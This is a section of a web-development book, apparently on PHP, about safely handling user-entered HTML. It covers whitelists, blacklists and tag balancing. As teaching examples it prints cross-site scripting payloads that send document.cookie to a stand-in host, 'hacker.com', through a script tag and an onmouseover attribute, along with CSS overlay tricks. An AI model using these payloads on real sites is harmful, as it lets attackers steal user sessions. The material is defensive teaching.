Previous Page
Next Page

5.5. Filtering HTML

Often, you want to allow users to style pieces of data they enter with rudimentary styling and attributes. When users enter a comment or description, you might want to allow them to enter a hyperlink, make a portion of their text bold, or even insert an image.

Since we'll be displaying it as HTML, it makes some amount of sense to accept and store it as HTMLit's already a markup language that does exactly what we want and there'll be no translation layer to output it. But the arguments against receiving and storing styled user data as HTML are worth considering.

5.5.1. Why Use HTML?

HTML is not a very compressed formatin a web application with a limited allowed vocabulary, styling can be much more concisely represented. This can be an issue if storage space is at a premium or the dataset needs to be kept small to stay resident in memory. The actual size saving, when extrapolated, usually turns out to be trivial. When the average piece of user text isn't styled at all, and each style block wastes five bytes, then you're not dealing with a huge aggregate increase in proportion to the size of the unstyled data.

HTML is a much wider vocabulary than is usually necessary for user input and is difficult to filter (we'll cover that in more detail shortly). Creating your own controlled formatting vocabulary makes for much easier input parsing. It does, however, make for more output formatting. This formatting tends to be far simpler and uses less cycles, but looking back to our input/output ratio, we can see that in the end we'll spend more time formatting data for output than input.

A positive argument for using HTML, at least at the input stage, is that generation of HTML input can be nicely streamlined. With contentEditable and friends, we can now build sophisticated user interfaces for styling text and inserting images and have the actual HTML source generated for us automaticallywe don't have to force users to enter the HTML source themselves.

5.5.2. HTML Input Filtering

So we have a wonderful utopia of input and output and the world is once again a safe place, right? Of course, all is not as great as it first appears. Displaying user- entered HTML in your application is a really, really bad idea. There's nothing stopping somebody from entering this as their description:

hello world
<style>
body { display: none !important; }
</style>

Displaying this user-entered HTML would make the page it's shown on invisible. Besides simple pranks, there are possible security implications, too:

hello world
<script>
location.href = 'http://hacker.com/?cookies='+document.cookie;
</style>

Here when users visit the page, their cookies (which may allow an attacker to spoof their account) are sent to the hacker's web site to be collected for later use. This is not something you want to allow.

Both CSS styles and JavaScript are big spoofing holes that allow a myriad of pranks and attacks to be performed. PHP provides a strip_tags( ) function that removes tag entities, leaving only those specified. Unfortunately, this does little to solve the issue. Consider the following example inputs:

<b style="display: block; 
        position: absolute; 
        top: 0px; 
        left: 0px; 
        width: 100%; 
        height: 100%; 
        background-color: #ffffff;">
                hello world</b>
<b onmouseover="location.href = 'http://hacker.com/?cookies='+
        document.cookie;">hello world</b>

Although we're only allowing simple style tags like <b>, we're still vulnerable to both style and script attacks. To be sure we're only allowing the markup we want, we need to filter both by tag and by attribute.

5.5.3. Blacklists and Whitelists

Many filtering approaches try to remove elements and attributes that are known to cause problems<script>, onclick, onmousedown, style, and so on. This method, often referred to as blacklisting, has a serious flawwhen a new browser comes out with new element and attribute support, you need to update your blacklist. The opposite approach, known conversely as whitelisting, combats this by only allowing a defined list of elements and attributes. A whitelist does not need updating as browsers change and is built around your business needs rather than your worries.

A good whitelist should be nice and short, allowing only the clearly needed elements and attributes. Unfortunately, merely filtering elements and attributes is not enough, and the content of some attributes needs to be filtered. The smaller the whitelist, the fewer the attributes that will need to be parsed and filtered and the fewer new possible vulnerabilities that can appear. This list, defined as an array of arrays in PHP, can be a good place to start:

$whitelist = array(
        'a' => array('href', 'target', 'title'),
        'b' => array( ),
        'img' => array('src', 'width', 'height', 'alt'),
);

5.5.4. Balancing

Filtering so that your data contains only the whitelisted elements and attributes won't necessarily make it valid and suitable for output. Consider the following user inputs:

<b>hello world
</div></div></div></div>hello world

The first example is a common and forgivable mistakea user opens a formatting tag but forgets to close it. The effect varies depending on the tag in question, but can include making the rest of the page bold the remainder of the page or turning all of the remaining text into a link.

The second example is a little more malicious. If you allow your users to enter structural markup, such as div or td tags, then an attacker could break out of the layout of your site and cause interesting display issues (especially if your navigation markup follows your content markup).

Both of these examples show that it's important to "balance" the tags in your inputcheck that any tags opened in the text are also closed, and any closing tags were opened. If you're displaying your output as XHTML, then you may also want to ensure that your tags nest correctly:

bad: <b><i>hello world</b></i>
good: <b><i>hello world</i></b>

Code that balances opening and closing tags also needs to deal with tags that don't need to be closed, such as <img> and <br>. In fact, your filtering will probably want to ensure that there are no matching closing tags; a </br> tag is not something you want to output. If you're outputting XHTML, you'll additionally want to ensure these tags self-close (<br />).

5.5.5. Dealing with HTML

If you want to allow your users to enter HTML, whether directly or through a WYSIWYG editor, then you're going to need to think carefully about how to process it. In addition to deciding on a subset of allowed syntax, you'll need to actually filter the input, removing tags and attributes not on the whitelist and balancing the tags that require it.

All this can be a lot of work and is prone to error. While PHP doesn't have this kind of functionality built in (the best we're given is strip_tags( )), there are libraries available that do. lib_filter is a pure PHP implementation that is free for use under a Creative Commons license (http://code.iamcal.com/php/lib_filter).

In the next section, we'll explore how a library like this works and the techniques for safely filtering all aspects of user-entered data.


Previous Page
Next Page